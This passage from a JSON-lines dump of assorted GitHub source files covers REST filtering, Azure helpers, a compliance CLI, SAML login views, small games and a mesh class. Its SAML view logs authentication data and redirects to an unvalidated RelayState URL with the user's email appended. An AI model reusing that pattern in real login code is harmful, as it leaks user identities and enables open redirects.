resolve validation errors from 500 status code to\n # 400.\n try:\n queryset = queryset.filter(query)\n except InternalValidationError as e:\n raise ValidationError(\n dict(e) if hasattr(e, 'error_dict') else list(e)\n )\n\n # A serializer can have this optional function\n # to dynamically apply additional filters on\n # any queries that will use that serializer\n # You could use this to have (for example) different\n # serializers for different subsets of a model or to\n # implement permissions which work even in sideloads\n if hasattr(serializer, 'filter_queryset'):\n queryset = serializer.filter_queryset(queryset)\n\n prefetch = prefetches.values()\n queryset = queryset.prefetch_related(*prefetch)\n if has_joins(queryset) or not is_root_level:\n queryset = queryset.distinct()\n\n return queryset\n\n\nclass DynamicSortingFilter(OrderingFilter):\n \"\"\"Subclass of DRF's OrderingFilter.\n\n This class adds support for multi-field ordering and rewritten fields.\n \"\"\"\n\n def filter_queryset(self, request, queryset, view):\n \"\"\"\"Filter the queryset, applying the ordering.\n\n The `ordering_param` can be overwritten here.\n In DRF, the ordering_param is 'ordering', but we support changing it\n to allow the viewset to control the parameter.\n \"\"\"\n self.ordering_param = view.SORT\n\n ordering = self.get_ordering(request, queryset, view)\n if ordering:\n return queryset.order_by(*ordering)\n\n return queryset\n\n def get_ordering(self, request, queryset, view):\n \"\"\"Return an ordering for a given request.\n\n DRF expects a comma separated list, while DREST expects an array.\n This method overwrites the DRF default so it can parse the array.\n \"\"\"\n params = view.get_request_feature(view.SORT)\n if params:\n fields = [param.strip() for param in params]\n valid_ordering, invalid_ordering = self.remove_invalid_fields(\n queryset, fields, view\n )\n\n # if any of the sort fields are invalid, throw an error.\n # else return the ordering\n if invalid_ordering:\n raise ValidationError(\n \"Invalid filter field: %s\" % invalid_ordering\n )\n else:\n return valid_ordering\n\n # No sorting was included\n return self.get_default_ordering(view)\n\n def remove_invalid_fields(self, queryset, fields, view):\n \"\"\"Remove invalid fields from an ordering.\n\n Overwrites the DRF default remove_invalid_fields method to return\n both the valid orderings and any invalid orderings.\n \"\"\"\n # get valid field names for sorting\n valid_fields_map = {\n name: source for name, label, source in self.get_valid_fields(\n queryset, view)\n }\n\n valid_orderings = []\n invalid_orderings = []\n\n # for each field sent down from the query param,\n # determine if its valid or invalid\n for term in fields:\n stripped_term = term.lstrip('-')\n # add back the '-' add the end if necessary\n reverse_sort_term = '' if len(stripped_term) is len(term) else '-'\n if stripped_term in valid_fields_map:\n name = reverse_sort_term + valid_fields_map[stripped_term]\n valid_orderings.append(name)\n else:\n invalid_orderings.append(term)\n\n return valid_orderings, invalid_orderings\n\n def get_valid_fields(self, queryset, view):\n \"\"\"Return valid fields for ordering.\n\n Overwrites DRF's get_valid_fields method so that valid_fields returns\n serializer fields, not model fields.\n \"\"\"\n valid_fields = getattr(view, 'ordering_fields', self.ordering_fields)\n\n if valid_fields is None or valid_fields == '__all__':\n # Default to allowing filtering on serializer fields\n serializer_class = getattr(view, 
'serializer_class')\n if serializer_class is None:\n msg = (\n \"Cannot use %s on a view which does not have either a \"\n \"'serializer_class' or 'ordering_fields' attribute.\"\n )\n raise ImproperlyConfigured(msg % self.__class__.__name__)\n valid_fields = [\n (field_name, field.label, field.source or field_name)\n for field_name, field in serializer_class().fields.items()\n if not getattr(\n field, 'write_only', False\n ) and not field.source == '*'\n ]\n else:\n serializer_class = getattr(view, 'serializer_class')\n valid_fields = [\n (field_name, field.label, field.source or field_name)\n for field_name, field in serializer_class().fields.items()\n if not getattr(field, 'write_only', False)\n and not field.source == '*' and field_name in valid_fields\n ]\n return valid_fields\n","repo_name":"trb116/pythonanalyzer","sub_path":"data/input/AltSchool/dynamic-rest/dynamic_rest/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":21769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3577370462","text":"import logging\nimport random\nimport uuid\n\nfrom azure.ai.ml._azure_environments import _get_base_url_from_metadata\nfrom azure.ai.ml._vendor.azure_resources._resource_management_client import ResourceManagementClient\nfrom azure.ai.ml._vendor.azure_resources.models import GenericResource\nfrom azure.ai.ml.constants._common import ArmConstants\nfrom azure.core.credentials import TokenCredential\n\nmodule_logger = logging.getLogger(__name__)\n\n\ndef get_name_for_dependent_resource(workspace_name: str, resource_type: str) -> str:\n alphabets_str = \"\"\n for char in workspace_name.lower():\n if char.isalpha() or char.isdigit():\n alphabets_str = alphabets_str + char\n rand_str = str(uuid.uuid4()).replace(\"-\", \"\")\n resource_name = alphabets_str[:8] + resource_type[:8] + rand_str\n return resource_name[:24]\n\n\ndef get_deployment_name(name: str):\n random.seed(version=2)\n return f\"{name}-{random.randint(1, 10000000)}\"\n\n\ndef get_resource_group_location(credentials: TokenCredential, subscription_id: str, resource_group_name: str) -> str:\n client = ResourceManagementClient(\n credential=credentials,\n subscription_id=subscription_id,\n base_url=_get_base_url_from_metadata(),\n api_version=ArmConstants.AZURE_MGMT_RESOURCE_API_VERSION,\n )\n rg = client.resource_groups.get(resource_group_name)\n return rg.location\n\n\ndef get_generic_arm_resource_by_arm_id(\n credentials: TokenCredential,\n subscription_id: str,\n arm_id: str,\n api_version: str,\n) -> GenericResource:\n if arm_id:\n client = ResourceManagementClient(\n credential=credentials,\n subscription_id=subscription_id,\n base_url=_get_base_url_from_metadata(),\n api_version=ArmConstants.AZURE_MGMT_RESOURCE_API_VERSION,\n )\n return client.resources.get_by_id(arm_id, api_version)\n return None\n\n\ndef delete_resource_by_arm_id(\n credentials: TokenCredential,\n subscription_id: str,\n arm_id: str,\n api_version: str,\n) -> None:\n if arm_id:\n client = ResourceManagementClient(\n credential=credentials,\n subscription_id=subscription_id,\n base_url=_get_base_url_from_metadata(),\n api_version=ArmConstants.AZURE_MGMT_RESOURCE_API_VERSION,\n )\n client.resources.begin_delete_by_id(arm_id, api_version)\n\n\ndef get_resource_and_group_name(armstr: str) -> str:\n return armstr.split(\"/\")[-1], armstr.split(\"/\")[-5]\n\n\ndef get_endpoint_parts(arm_id: str, subnet_arm_id: str) -> ():\n arm_id_parts = arm_id.split(\"/\")\n subnet_id_parts = 
subnet_arm_id.split(\"/\")\n conn_name = arm_id_parts[-1]\n subscription_id = arm_id_parts[2]\n resource_group = arm_id_parts[4]\n vnet_name = subnet_id_parts[-3]\n subnet_name = subnet_id_parts[-1]\n return conn_name, subscription_id, resource_group, vnet_name, subnet_name\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/ml/azure-ai-ml/azure/ai/ml/_utils/_workspace_utils.py","file_name":"_workspace_utils.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"12218487050","text":"\"\"\"\nThe qw (Quality Workflow) tool.\n\nHelps enforce regulatory compliance for projects managed on GitHub.\n\"\"\"\n\nimport sys\nfrom enum import Enum\nfrom typing import Annotated, Optional\n\nimport git\nimport typer\nfrom loguru import logger\nfrom rich.prompt import Prompt\n\nfrom qw.base import QwError\nfrom qw.changes import ChangeHandler\nfrom qw.local_store.keyring import get_qw_password, set_qw_password\nfrom qw.local_store.main import LocalStore\nfrom qw.mergedoc import load_template\nfrom qw.remote_repo.factory import get_service\nfrom qw.remote_repo.service import (\n Service,\n get_repo_url,\n hostname_to_service,\n remote_address_to_host_user_repo,\n)\n\napp = typer.Typer()\n\n\nclass LogLevel(str, Enum):\n \"\"\"Log Level.\"\"\"\n\n ERROR = \"error\"\n WARNING = \"warning\"\n INFO = \"info\"\n DEBUG = \"debug\"\n\n\nLOGLEVEL_TO_LOGURU = {\n LogLevel.DEBUG: 10,\n LogLevel.INFO: 20,\n LogLevel.WARNING: 30,\n LogLevel.ERROR: 40,\n}\n\nstore = LocalStore()\n\n\ndef _build_and_check_service():\n conf = store.read_configuration()\n service = get_service(conf)\n service.check()\n typer.echo(\"Can connect to the remote repository 🎉\")\n return service\n\n\n@app.callback()\ndef main(\n loglevel: Annotated[\n Optional[LogLevel],\n typer.Option(\n help=\"Level of logging to output\",\n ),\n ] = LogLevel.INFO,\n):\n \"\"\"\n Process global options.\n\n Processes the options passed before the command.\n \"\"\"\n logger.remove()\n if loglevel is not None:\n logger.add(sys.stderr, level=LOGLEVEL_TO_LOGURU[loglevel])\n\n\n@app.command()\ndef init(\n repo: Annotated[\n Optional[str],\n typer.Option(\n help=\"The URL (or remote name) for the repo containing\"\n \" the issues. If not supplied the remotes named\"\n \" 'upstream' and 'origin' will be tried.\",\n ),\n ] = None,\n service: Annotated[\n Optional[Service],\n typer.Option(\n help=\"Which service is hosting the issue tracker. 
Not\"\n \" required if the repo URL begins 'github' or 'gitlab'.\",\n ),\n ] = None,\n force: Annotated[\n Optional[bool],\n typer.Option(\n help=\"Replace any existing configuration.\",\n ),\n ] = False,\n) -> None:\n \"\"\"Initialize this tool and the repository (as far as possible).\"\"\"\n gitrepo = git.Repo(store.base_dir)\n repo = get_repo_url(gitrepo, repo)\n store.get_or_create_qw_dir(force=force)\n (host, username, reponame) = remote_address_to_host_user_repo(repo)\n if service is None:\n service = hostname_to_service(host)\n store.initialise_qw_files(repo, reponame, service, username)\n\n\n@app.command()\ndef check(\n issue: Annotated[\n Optional[int],\n typer.Option(\n help=\"Issue number to check\",\n ),\n ] = None,\n review_request: Annotated[\n Optional[int],\n typer.Option(\n help=\"Review request number to check\",\n ),\n ] = None,\n token: Annotated[\n Optional[str],\n typer.Option(\n help=\"CI access token to use for checking, otherwise will use local config\",\n ),\n ] = None,\n repository: Annotated[\n Optional[str],\n typer.Option(\n help=\"Repository in form '${organisation}/${repository}'\",\n ),\n ] = None,\n) -> None:\n \"\"\"Check issue or pull request for any QW problems.\"\"\"\n if token and repository:\n logger.info(\"Using CI access token for authorisation\")\n else:\n logger.info(\n \"Using local qw config for authorisation because '--token' and '--repository' were not used\",\n )\n _build_and_check_service()\n # currently dummy function as doesn't need real functionality for configuration\n if issue and review_request:\n QwError(\n \"Check should only be run on an issue or a review_request, not both at the same time\",\n )\n if not (issue or review_request):\n QwError(\"Nothing given to check, please add a issue or review_request to check\")\n logger.success(\n \"Checks complete, stdout will contain a checklist of any problems found\",\n )\n\n\n@app.command()\ndef login(\n *,\n force: Annotated[\n Optional[bool],\n typer.Option(\n help=\"Replace existing access credentials.\",\n ),\n ] = False,\n):\n \"\"\"Add access credentials for the remote repository.\"\"\"\n conf = store.read_configuration()\n existing_access_token = get_qw_password(conf[\"user_name\"], conf[\"repo_name\"])\n\n if existing_access_token and not force:\n typer.echo(\n \"Access token already exists, rerun with '--force' if you want to override it.\",\n )\n else:\n access_token = Prompt.ask(\n f\"Please copy the access token for {conf['service']}\",\n )\n\n set_qw_password(conf[\"user_name\"], conf[\"repo_name\"], access_token)\n\n _build_and_check_service()\n\n\n@app.command()\ndef freeze():\n \"\"\"Freeze the state of remote design stages and update local store.\"\"\"\n conf = store.read_configuration()\n service = get_service(conf)\n change_handler = ChangeHandler(service, store)\n to_save = change_handler.combine_local_and_remote_items()\n store.write_local_data([x.to_dict() for x in to_save])\n logger.info(\"Finished freeze\")\n\n\n@app.command()\ndef configure(\n force: Annotated[\n Optional[bool],\n typer.Option(\n help=\"Replace existing configuration.\",\n ),\n ] = False,\n):\n \"\"\"Configure remote repository for qw (after initialisation and login credentials added).\"\"\"\n service = _build_and_check_service()\n store.write_templates_and_ci(service, force=force)\n typer.echo(\n \"Local repository updated, please commit the changes made to your local repository.\",\n )\n service.update_remote(force=force)\n typer.echo(\n \"Updated remote repository with rules\",\n 
)\n\n\n@app.command()\ndef release():\n \"\"\"Produce documentation by merging frozen values into templates.\"\"\"\n doc = load_template(\"tests/resources/msword/test_template.docx\")\n doc.write(\n output_file=\"out.docx\",\n data={\n \"soup\": [\n {\n \"id\": \"34\",\n \"name\": \"Python\",\n \"description\": \"The **Python** programming language\",\n },\n {\n \"id\": \"75\",\n \"name\": \"python-docx\",\n \"description\": (\n \"The *Python* module `python-docx`.\\n\"\n \"* provides access to MS Word Documents\\n\"\n \"* Isn't very good\"\n ),\n },\n ],\n \"software-requirement\": [\n {\n \"id\": \"101\",\n \"name\": \"Dose input\",\n \"description\": \"Allow the user to input the *dose*.\",\n \"system-requirement\": \"31\",\n },\n {\n \"id\": \"102\",\n \"name\": \"Dose measurement\",\n \"description\": (\"The *hardware* must measure the dose given.\"),\n \"system-requirement\": \"32\",\n },\n {\n \"id\": \"103\",\n \"name\": \"Dose articulation\",\n \"description\": (\n \"The *hardware* must stop delivering the\"\n \" medicine when dose given meets the dose\"\n \" required.\"\n ),\n \"system-requirement\": \"32\",\n },\n {\n \"id\": \"104\",\n \"name\": \"Lock screen\",\n \"description\": (\n \"The [screen](https://dictionary.cambridge.org\"\n \"/dictionary/english/screen) should show\"\n \" `locked` when the _lock_ button is pressed\"\n ),\n \"system-requirement\": \"33\",\n },\n ],\n \"system-requirement\": [\n {\n \"id\": \"31\",\n \"name\": \"Dose input\",\n \"description\": \"User must be able to input the dose\",\n },\n {\n \"id\": \"32\",\n \"name\": \"Dose correct\",\n \"description\": \"Dose must match the input dose\",\n },\n {\n \"id\": \"33\",\n \"name\": \"Lockable\",\n \"description\": (\n \"Device should be easily lockable and only\"\n \" unlockable by the registered user.\"\n ),\n },\n {\n \"id\": \"34\",\n \"name\": \"Something else\",\n \"description\": \"Are we having **fun** yet?\",\n },\n ],\n },\n )\n\n\nif __name__ == \"__main__\":\n try:\n app()\n sys.exit(0)\n except QwError as e:\n sys.stderr.write(str(e) + \"\\n\")\n sys.exit(2)\n","repo_name":"UCL-ARC/qw","sub_path":"src/qw/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":9129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"24662599207","text":"import os\n\nfrom rest_framework import viewsets, mixins\nfrom rest_framework.permissions import AllowAny\nfrom .models import User\nfrom .permissions import IsUserOrReadOnly\nfrom .serializers import CreateUserSerializer, UserSerializer\n\nfrom rest_framework.response import Response\nfrom django.http import HttpResponseRedirect\n\nfrom rest_framework.decorators import action\n\nfrom django.conf import settings\nfrom rest_framework.settings import api_settings\n\nfrom onelogin.saml2.auth import OneLogin_Saml2_Auth\nfrom onelogin.saml2.settings import OneLogin_Saml2_Settings\nfrom onelogin.saml2.utils import OneLogin_Saml2_Utils\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nclass UserViewSet(mixins.RetrieveModelMixin,\n mixins.UpdateModelMixin,\n viewsets.GenericViewSet):\n \"\"\"\n Updates and retrieves user accounts\n \"\"\"\n queryset = User.objects.all()\n serializer_class = UserSerializer\n permission_classes = (IsUserOrReadOnly,)\n\n\nclass UserCreateViewSet(mixins.CreateModelMixin,\n viewsets.GenericViewSet):\n \"\"\"\n Creates user accounts\n \"\"\"\n queryset = User.objects.all()\n serializer_class = CreateUserSerializer\n permission_classes = 
(AllowAny,)\n\n\nclass IndexViewset(viewsets.ViewSet):\n \n permission_classes = [AllowAny]\n\n def list(self, request):\n return Response({ 'message': 'index 1' })\n\n\nclass AttrsViewset(viewsets.ViewSet):\n \n permission_classes = [AllowAny]\n\n def list(self, request):\n # print('settings', settings.__dict__)\n print('settings', BASE_DIR, os.path.join(BASE_DIR, 'settings.json'))\n return Response({ 'message': 'attrs 1' })\n\n\ndef init_saml_auth(req):\n auth = OneLogin_Saml2_Auth(req, custom_base_path=settings.SAML_FOLDER)\n return auth\n\n\ndef prepare_django_request(request):\n # If server is behind proxys or balancers use the HTTP_X_FORWARDED fields\n result = {\n 'https': 'on' if request.is_secure() else 'off',\n 'http_host': request.META['HTTP_HOST'],\n 'script_name': request.META['PATH_INFO'],\n 'server_port': request.META['SERVER_PORT'],\n 'get_data': request.GET.copy(),\n # Uncomment if using ADFS as IdP, https://github.com/onelogin/python-saml/pull/144\n # 'lowercase_urlencoding': True,\n 'post_data': request.POST.copy()\n }\n return result\n\n\nclass ACSViewset(viewsets.ViewSet):\n \n permission_classes = [AllowAny]\n\n @action(url_path='', methods=['post'], detail=False)\n def acs(self, request):\n req = prepare_django_request(request)\n print('\\n', '-'*25)\n print('req', req)\n print('\\n\\n')\n\n # settings_path = os.path.join(BASE_DIR, 'settings.json')\n auth = OneLogin_Saml2_Auth(req, custom_base_path=BASE_DIR)\n print('\\n', '-'*25)\n print('auth', auth)\n print('\\n\\n')\n\n auth.process_response()\n errors = auth.get_errors()\n print('\\n', '-'*25)\n print('errors', errors)\n print('\\n\\n')\n\n\n if not errors:\n print('\\n', '-'*25)\n print('auth.is_authenticated()', auth.is_authenticated())\n print('\\n\\n')\n\n if auth.is_authenticated():\n print('\\n', '-'*25)\n print('auth.get_attributes()', auth.get_attributes())\n print('\\n\\n')\n\n print('\\n', '-'*25)\n print('auth.get_settings()', auth.get_settings())\n print('\\n\\n')\n\n print('\\n', '-'*25)\n print('auth.get_nameid()', auth.get_nameid())\n print('\\n\\n')\n\n name_id=auth.get_nameid()\n \n request.session['samlUserdata'] = auth.get_attributes()\n \n print('\\n', '-'*25)\n print('req[post_data]', req['post_data'])\n print('\\n\\n')\n\n print('\\n', '-'*25)\n print('OneLogin_Saml2_Utils.get_self_url(req)', OneLogin_Saml2_Utils.get_self_url(req))\n print('\\n\\n')\n\n print('\\n', '-'*25)\n print('\\'RelayState\\' in req[\\'post_data\\'] and OneLogin_Saml2_Utils.get_self_url(req) != req[\\'post_data\\'][\\'RelayState\\']', 'RelayState' in req['post_data'] and OneLogin_Saml2_Utils.get_self_url(req) != req['post_data']['RelayState'])\n print('\\n\\n') \n\n if 'RelayState' in req['post_data'] and OneLogin_Saml2_Utils.get_self_url(req) != req['post_data']['RelayState']:\n print('auth.redirect_to(req[\\'post_data\\'][\\'RelayState\\'])', req['post_data']['RelayState'])\n # auth.redirect_to(req['post_data']['RelayState'])\n url = req['post_data']['RelayState']\n url = '{url}?isAuthenticated=true&email={email}'.format(**{\n 'url': url,\n 'email': name_id\n })\n return HttpResponseRedirect(redirect_to=url)\n else:\n for attr_name in request.session['samlUserdata'].keys():\n print('%s ==> %s' % (attr_name, '|| '.join(request.session['samlUserdata'][attr_name])))\n else:\n print('Not authenticated')\n else:\n print(\"Error when processing SAML Response: %s\" % (', '.join(errors)))\n\n return Response({ 'message': 'ACS' 
})","repo_name":"akshays94/sso-test-server","sub_path":"piedpiper/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"10248113161","text":"import json\r\nfrom player import Player\r\nimport pygame\r\nimport sys\r\n\r\nWINDOW_WIDTH = 1000\r\nWINDOW_HEIGHT = 600\r\n\r\n\r\n\r\narquivo_json = 'C:/Users/pedri/OneDrive/Área de Trabalho/programação/python/Orientação a Objetos - Faculdade/Projeto Final/players.json'\r\nwith open(arquivo_json) as fp:\r\n playersList = json.load(fp)\r\n\r\n\r\nclass Leaderboard:\r\n def __init__(self, window):\r\n self.window = window\r\n self.font = pygame.font.Font(None, 36)\r\n self.overlay = pygame.Surface((WINDOW_WIDTH, WINDOW_HEIGHT))\r\n self.overlay.set_alpha(200) # Ajuste a opacidade conforme necessário\r\n self.overlay.fill((0, 0, 0))\r\n \r\n\r\n def mostrar_pontuacoes(self, scores):\r\n showing_scores = True\r\n\r\n while showing_scores:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n self.window.blit(self.overlay, (0, 0))\r\n\r\n text = self.font.render(\"Maiores Pontuações: \", True, (255, 255, 255))\r\n self.window.blit(text, (WINDOW_WIDTH // 2 - text.get_width() // 2, 20))\r\n\r\n for i, score in enumerate(scores):\r\n text = self.font.render(f\"{i + 1}- {score}\", True, (255, 255, 255))\r\n self.window.blit(text, (WINDOW_WIDTH // 2 - text.get_width() // 2, 70 + i * 30))\r\n\r\n pygame.display.flip()\r\n \r\n \r\ndef scores():\r\n listaMaioresPontuacoes = []\r\n listaNomesMaioresPontuadores = []\r\n for i in range(len(playersList)):\r\n listaMaioresPontuacoes.append(playersList[i]['_Player__pontuacao'])\r\n listaNomesMaioresPontuadores.append(playersList[i]['_Player__nome'])\r\n #ordernar o dicionario\r\n dados_combinados = list(zip(listaMaioresPontuacoes, listaNomesMaioresPontuadores))\r\n dados_combinados = sorted(dados_combinados, reverse=True)\r\n return dados_combinados[:10]\r\n\r\ndef adicionar_player(nome_de_usuario): #adiciona um player novo a nossa base de dados\r\n newPlayer = Player(nome_de_usuario, 100)\r\n playersList.append(vars(newPlayer))\r\n with open(arquivo_json, 'w') as updateFile:\r\n json.dump(playersList, updateFile, indent=4)\r\n\r\n\r\n\r\ndef verificar_player(username):\r\n if(len(playersList) == 0):\r\n return 2 #significa que a nossa base de dados nao tem nenhum player\r\n for i in range(len(playersList)):\r\n if playersList[i]['_Player__nome'] == username: \r\n #se existe, a funcao retornará o nome e a pontuacao do player\r\n return playersList[i]['_Player__nome'], playersList[i]['_Player__pontuacao']\r\n return False #quer dizer que o player nao existe na nossa base de dados\r\n \r\n \r\ndef inicializar_score(username):\r\n for i in range(len(playersList)):\r\n if playersList[i]['_Player__nome'] == username:\r\n return playersList[i]['_Player__pontuacao']\r\n \r\n \r\n \r\ndef atualizar_score(username, score):\r\n for i in range(len(playersList)):\r\n if playersList[i]['_Player__nome'] == username:\r\n playersList[i]['_Player__pontuacao'] = score\r\n with open(arquivo_json, 'w') as updateFile:\r\n json.dump(playersList, updateFile, indent=4)","repo_name":"patrickacs/projeto01-oo","sub_path":"Projeto Final/leaderboard.py","file_name":"leaderboard.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} 
+{"seq_id":"4458598384","text":"from alexnet import alexnet\nimport numpy as np\nimport config\nimport cv2\nimport time\nfrom key_output import PressKey,ReleaseKey, W, A, D\nimport win32api\nimport win32con\nimport win32gui\nimport win32ui\nimport random\n\n#This function reads user keypresses\ndef readKey():\n keys = []\n for key in \"C\":\n if win32api.GetAsyncKeyState(ord(key)):\n keys.append(key)\n return keys\n\n# This function captures screenshots of the game window\n# This function was modified from https://stackoverflow.com/questions/50278695/grabscreen-py-python-win32api\ndef screenGrab(left, top):\n hwin = win32gui.GetDesktopWindow()\n\n width = config.WINDOW_WIDTH - left + 1\n height = config.WINDOW_HEIGHT - top + 1\n\n hwindc = win32gui.GetWindowDC(hwin)\n srcdc = win32ui.CreateDCFromHandle(hwindc)\n memdc = srcdc.CreateCompatibleDC()\n bmp = win32ui.CreateBitmap()\n bmp.CreateCompatibleBitmap(srcdc, width, height)\n memdc.SelectObject(bmp)\n memdc.BitBlt((0, 0), (width, height), srcdc, (left, top), win32con.SRCCOPY)\n\n signedIntsArray = bmp.GetBitmapBits(True)\n img = np.fromstring(signedIntsArray, dtype='uint8')\n img.shape = (height,width,4)\n\n srcdc.DeleteDC()\n memdc.DeleteDC()\n win32gui.ReleaseDC(hwin, hwindc)\n win32gui.DeleteObject(bmp.GetHandle())\n\n return cv2.cvtColor(img, cv2.COLOR_BGRA2RGB)\n\ndef main():\n\n model = alexnet(config.CAPTURE_WIDTH, config.CAPTURE_HEIGHT, config.LEARNING_RATE)\n model.load(config.MODEL_NAME)\n \n paused = False\n print('AI is driving, press \"C\" to pause') # \"C\" used for convenient keyboard position\n\t\n while(True):\n if not paused:\n screenShot = screenGrab(0,40) # 40 pixel offset to account for titlebar\n\t\t\t\n\t\t\t# Reduce image size\n screenShot = cv2.cvtColor(screenShot, cv2.COLOR_BGR2RGB)\n screenShot = cv2.resize(screenShot, (config.CAPTURE_WIDTH, config.CAPTURE_HEIGHT))\n\t\t\t\n\t\t\t# Get model prediction\n prediction = model.predict([screenShot.reshape(config.CAPTURE_WIDTH,config.CAPTURE_HEIGHT,3)])[0]\n #print( np.trunc(prediction*10**2) / (10**2) * 100 ) # prediction printout\n\n # \"Only turn if you're sure you want to turn!\"\n turningThreshold = 0.85\n accelerationThreshold = 0.95\n\n if prediction[1] > accelerationThreshold:\n PressKey(W)\n print(\"GO\")\n elif prediction[0] > turningThreshold:\n PressKey(A)\n print(\"Left\")\n elif prediction[2] > turningThreshold:\n PressKey(D)\n print(\"Right\")\n \n\t\t\t# Using sleep is not an ideal method because execution is suspended, need to find a way to do some sort of callback if there is time\n time.sleep(config.KEY_PRESS_DURATION) \n\t\t\t# Release all keys after alotted time\n ReleaseKey(W)\n ReleaseKey(A)\n ReleaseKey(D)\n\n keys = readKey()\n\n if 'C' in keys:\n if paused == True:\n paused = False\n time.sleep(0.5) # This line prevents thrashing of toggle state\n print('AI driving')\n else:\n paused = True\n time.sleep(0.5)\n print('AI paused')\n\nmain() \n\n\n\n\n\n\n\n\n\n\n","repo_name":"CoolerGalaxy/AI_Car_Driver","sub_path":"test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43349335320","text":"import math\nimport datetime as dt\nimport random\nimport yaml\n\nwith open('configs/priority.yml', 'r') as file:\n configs = yaml.safe_load(file)\n\nRATE_WEIGHT = configs['rate_weight']\nCALM_WINDOW = configs['calm_window']\nRANDOM_BOMBING = configs['random_bombing']\nRANDOM_WEIGHT = 
configs['random_weight']\nNEW_WORD_WEIGHT = configs['new_word_weight']\n\n\nclass ComputePriority(object):\n def __init__(self):\n self.today = dt.datetime.today().date()\n\n def compute(self, keywords):\n assert isinstance(keywords, dict)\n for key, val in keywords.items():\n last_review = val['review_history'][-1]\n last_date, last_rate = last_review[0], last_review[1]\n year, month, day = last_date.split('-')\n delta_days = (self.today - dt.date(int(year), int(month), int(day))).days\n\n # Calm Window: for newly reviewed/created keywords\n if delta_days <= CALM_WINDOW:\n val['priority'] = 100\n continue\n\n # Base Priority: is based on algorithm function\n base_priority = self.algorithm(delta_days)\n\n # Review Adjusted Priority: is based on latest review\n adjusted_priority = base_priority * RATE_WEIGHT[last_rate]\n adjusted_priority = round(min(100.0, adjusted_priority), 1)\n val['priority'] = adjusted_priority\n\n # Random bombing: toss a coin and decide if random bomb\n coin = random.random()\n if coin < RANDOM_BOMBING['prob']:\n val['priority'] *= RANDOM_BOMBING['weight']\n\n # Random weight: toss a coin and decide the random weight\n # This is to avoid 2 similar keywords always stick together\n coin2 = random.randint(0, len(RANDOM_WEIGHT)-1)\n random_weight = RANDOM_WEIGHT[coin2]\n val['priority'] *= random_weight\n\n # Promote new words:\n # Words passed calm window but hasn't been reviewed yet\n if len(val['review_history']) <= 1:\n val['priority'] *= NEW_WORD_WEIGHT\n\n return keywords\n\n def algorithm(self, days):\n # Ebbinghaus Forgetting Curve\n c = 1.25\n k = 1.84\n t = days * 24 * 60\n b = 100 * k / (math.log(t, 10)**c + k)\n return b\n\n\n\n","repo_name":"ruthnot/keyword-master","sub_path":"compute_priority.py","file_name":"compute_priority.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8830854444","text":"from clld.web.util.htmllib import HTML, literal\nfrom clld.web.util.helpers import map_marker_img, get_adapter, external_link\n\n\ndef contribution_detail_html(context=None, request=None, **kw):\n c = context.description\n if c and \"\" in c:\n c = c.split(\"\")[1].split(\"\")[0]\n return {\"text\": c}\n\n\ndef value_table(ctx, req):\n rows = []\n langs = {}\n\n for i, de in enumerate(ctx.domain):\n exclusive = 0\n shared = 0\n\n for v in [_v for _v in de.values]:\n\n if len(v.valueset.values) > 1:\n shared += 1\n else:\n exclusive += 1\n langs[v.valueset.language_pk] = 1\n\n cells = [\n HTML.td(map_marker_img(req, de)),\n HTML.td(literal(de.description)),\n HTML.td(str(exclusive), class_='right'),\n ]\n cells.append(HTML.td(str(shared), class_='right'))\n cells.append(HTML.td(str(len(de.values)), class_='right'))\n rows.append(HTML.tr(*cells))\n\n\n rows.append(HTML.tr(\n HTML.td('Total Languages:', colspan=str(len(cells) - 1), class_='right'),\n HTML.td('%s' % len(langs), class_='right')))\n\n parts = []\n # if ctx.multivalued:\n parts.append(HTML.thead(\n HTML.tr(*[HTML.th(s, class_='right')\n for s in [' ', ' ', 'exclusive', 'partial', 'all']]))\n )\n parts.append(HTML.tbody(*rows))\n return HTML.table(*parts, class_='table table-condensed')\n\n\ndef parameter_link(req, sym, p):\n return HTML.a(sym, href=req.resource_url(p), style=\"color: black;\") if p else 
sym","repo_name":"PaprikaSteiger/ooaclld","sub_path":"ooaclld/ooaclld/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9783302805","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport numpy as np\nimport open3d\nimport math\n\n\n#assume all geometry lies in radius of 1;\n#set the parameter as this then;\n#somehow load a \n#there may be a large deformation...one may need to have vertex color instead;\nclass TriMesh(nn.Module):\n def __init__(self,radius=.7,tex_channel=3,resolution_mesh=4000,resolution_featmap=1024):\n super().__init__()\n sph_init=open3d.geometry.TriangleMesh.create_sphere(radius=radius,resolution=int(math.sqrt(resolution_mesh//4))+1,create_uv_map=True)\n vtx=torch.from_numpy(np.asarray(sph_init.vertices).astype(np.float32))\n tri=torch.from_numpy(np.asarray(sph_init.triangles).astype(np.int32))\n uv=torch.from_numpy(np.asarray(sph_init.triangle_uvs).astype(np.float32))\n uv_index=torch.from_numpy(np.arange(0,uv.shape[0]).astype(np.int32).reshape(uv.shape[0]//3,3))\n texmap=torch.zeros((resolution_featmap,resolution_featmap,tex_channel),dtype=torch.float32)\n vertex_color=torch.zeros((vtx.shape[0],tex_channel),dtype=torch.float32)\n \n 